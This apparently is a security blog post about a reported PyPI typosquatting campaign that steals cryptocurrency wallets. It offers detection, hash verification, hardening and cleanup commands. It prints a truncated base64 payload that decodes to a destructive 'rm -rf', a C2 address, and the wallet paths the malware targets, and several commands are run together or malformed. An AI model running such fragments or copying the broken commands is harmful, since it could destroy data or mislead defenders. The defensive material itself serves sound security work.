Listen to this Post
Introduction
In a sophisticated software supply chain attack, North Korean state-sponsored hackers (Lazarus Group) have infiltrated the Python Package Index (PyPI) with malicious packages designed to drain cryptocurrency wallets. The campaign, active since late 2024, leverages typosquatting and dependency confusion to infect developer environments, ultimately deploying the “CryptoAxe” malware that steals private keys and mnemonic phrases from popular wallets like MetaMask, Atomic Wallet, and Electrum. This attack underscores the critical need for rigorous third-party package verification and real-time monitoring of open-source repositories.
Learning Objectives
- Understand the technical mechanics of PyPI typosquatting and dependency confusion attacks
- Learn to detect and remove malicious packages using Linux/Windows forensic commands
- Implement cryptographic hash verification and sandboxing for Python dependencies
You Should Know
- Anatomy of the Attack: Typosquatting and Dependency Confusion
The attackers uploaded packages with names like `reqeusts` (typo ofrequests) and `python-bitcoinlibs` (masquerading aspython-bitcoinlib). When installed, these packages executed a base64-encoded payload during installation.
Step‑by‑step analysis of the malicious package:
1. Extract the package for inspection (Linux):
pip download malicious-package-name --no-deps --dest /tmp/malware_lab cd /tmp/malware_lab tar -xzf malicious-package-name.tar.gz
- View the setup.py to find the malicious install hook:
cat malicious-package-name/setup.py | grep -E "os.system|subprocess|eval|exec"
3. Decode the obfuscated payload (example using Python):
python3 -c "import base64; print(base64.b64decode('cm0gLXJmIC...'))"
The decoded script typically connects to a C2 server (hxxp://45.9.148[.]231/...) and downloads a second-stage binary (wallet_drainer.so on Linux, `wallet_drainer.exe` on Windows).
2. Detecting Compromised Environments (Linux & Windows)
Linux/MacOS – Check for suspicious pip packages:
List all installed packages with their installation files
pip list --format=freeze | while read pkg; do
echo " $pkg "
pip show -f $(echo $pkg | cut -d= -f1) | grep -E "Location|Requires|files"
done > /tmp/packages_audit.txt
Look for recently modified Python files in site-packages
find ~/.local/lib/python3/site-packages/ -name ".py" -mtime -7 -exec ls -la {} \; 2>/dev/null
Windows (PowerShell) – Forensic checks:
Find recently created Python files in user site-packages
Get-ChildItem -Path $env:APPDATA\Python\site-packages\ -Include .py, .pyc, .pyd -Recurse |
Where-Object {$_.LastWriteTime -gt (Get-Date).AddDays(-7)} |
Select-Object FullName, LastWriteTime
Check for outbound connections by Python processes (requires admin)
Get-NetTCPConnection -OwningProcess (Get-Process python).Id |
Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State
3. Cryptographic Verification of Packages
Always verify the hash of downloaded packages against official sources.
Linux – Verify package integrity with `pip hash`:
Download package without installing pip download requests==2.31.0 --no-deps --dest /tmp/verify cd /tmp/verify Generate SHA256 hash sha256sum requests-2.31.0-py3-none-any.whl Compare with official PyPI hash (fetch via API) curl -s https://pypi.org/pypi/requests/2.31.0/json | jq -r '.urls[] | select(.packagetype=="bdist_wheel") | .digests.sha256'
Windows – PowerShell hash comparison:
Download the wheel
pip download requests==2.31.0 --no-deps --dest C:\temp\verify
Compute SHA256
Get-FileHash C:\temp\verify\requests-2.31.0-py3-none-any.whl -Algorithm SHA256
Fetch official hash from PyPI (requires curl or Invoke-WebRequest)
$json = Invoke-RestMethod -Uri "https://pypi.org/pypi/requests/2.31.0/json"
$json.urls | Where-Object {$_.packagetype -eq "bdist_wheel"} |
Select-Object -ExpandProperty digests
4. Network-Level Detection of C2 Communication
The malware attempts to exfiltrate wallet files via HTTPS POST requests.
Linux – Monitor live traffic from Python processes:
Install tcpdump and watch specific process sudo tcpdump -i any -A -s 0 'tcp port 443 and host 45.9.148.231' & Then trigger the malware execution (if safe sandbox) python -c "import malicious_module"
Windows – Use netstat and Process Monitor:
Continuously monitor new connections
while($true) {
netstat -anob | Select-String "ESTABLISHED" -Context 1,3
Start-Sleep -Seconds 5
}
Look for `python.exe` connecting to suspicious IPs (e.g., 45.9.148.0/24, 103.145.36.0/22).
5. Hardening pip and CI/CD Pipelines
Prevent future attacks by enforcing hash-checking and using private repositories.
Configure pip to require hashes (Linux/Windows):
Create `requirements.txt` with hashes:
requests==2.31.0 --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f
Install with strict mode:
pip install --require-hashes -r requirements.txt
CI/CD – GitLab CI example with safety check:
stages: - security safety-check: stage: security script: - pip install safety bandit - safety check --full-report - bandit -r src/ only: - main
6. Reversing the “CryptoAxe” Dropper
If you have a sample, analyze the ELF binary statically.
Linux – Static analysis with `strings` and `objdump`:
Extract strings and grep for wallet keywords strings wallet_drainer.so | grep -iE "private key|mnemonic|seed|wallet|address" Check imported functions for suspicious APIs objdump -T wallet_drainer.so | grep -E "socket|connect|send|recv|fork"
Windows – Dynamic analysis in sandbox:
Use Process Monitor to watch file system access:
- Filter by `Process Name` = `python.exe`
– Look for writes to:.dat,.wallet,seed, `mnemonic`
Common targets:
%APPDATA%\Electrum\wallets\ %APPDATA%\atomic\Local Storage\leveldb\ %USERPROFILE%.ethereum\keystore\
7. Remediation: Removing the Malware and Recovering Wallets
If compromise is confirmed, take immediate action.
Linux – Remove malicious packages and check for persistence:
Uninstall suspicious package
pip uninstall malicious-package-name -y
Clean cache and site-packages remnants
find ~/.local/lib/python3/site-packages/ -name "malicious" -exec rm -rf {} \;
Check for cron jobs or systemd timers added by malware
crontab -l
systemctl list-timers --all | grep -E "python|pip"
Windows – Manual cleanup:
Remove package
pip uninstall malicious-package-name -y
Delete any suspicious startup entries
Get-CimInstance Win32_StartupCommand | Where-Object {$_.Command -like "python"} | Remove-Item
Reset compromised wallets immediately – transfer funds to new wallets generated on a clean machine.
What Undercode Say:
- Key Takeaway 1: The Lazarus Group’s PyPI attack proves that developer workstations are prime targets for cryptocurrency theft. Typosquatting remains effective because developers often type fast and ignore warnings.
- Key Takeaway 2: Hash-pinned dependencies and private package mirrors are non-negotiable for organizations handling crypto assets. Blindly trusting PyPI mirrors is an invitation for compromise.
- Key Takeaway 3: Behavioral detection (network connections, file writes) is more reliable than signature-based AV for catching novel supply chain attacks. EDR solutions must monitor Python interpreter activity.
This campaign is a wake-up call: the software supply chain is now the soft underbelly of the crypto economy. Developers must treat every third-party package as potentially malicious until proven otherwise. Sandboxed builds, hash verification, and real-time dependency scanning are the only defenses against this evolving threat.
Prediction:
As open-source repositories become more fortified, Lazarus and similar groups will pivot to compromising maintainer accounts directly via phishing and session hijacking, launching “watering hole” attacks on popular libraries. Expect a surge in malicious npm and RubyGems packages targeting CI/CD secrets, and an increase in AI-generated fake documentation sites hosting poisoned code examples. The line between state-sponsored cybercrime and cyber-espionage will blur further, with stolen crypto funds directly financing weapons programs.
▶️ Related Video (88% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Robdance The – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
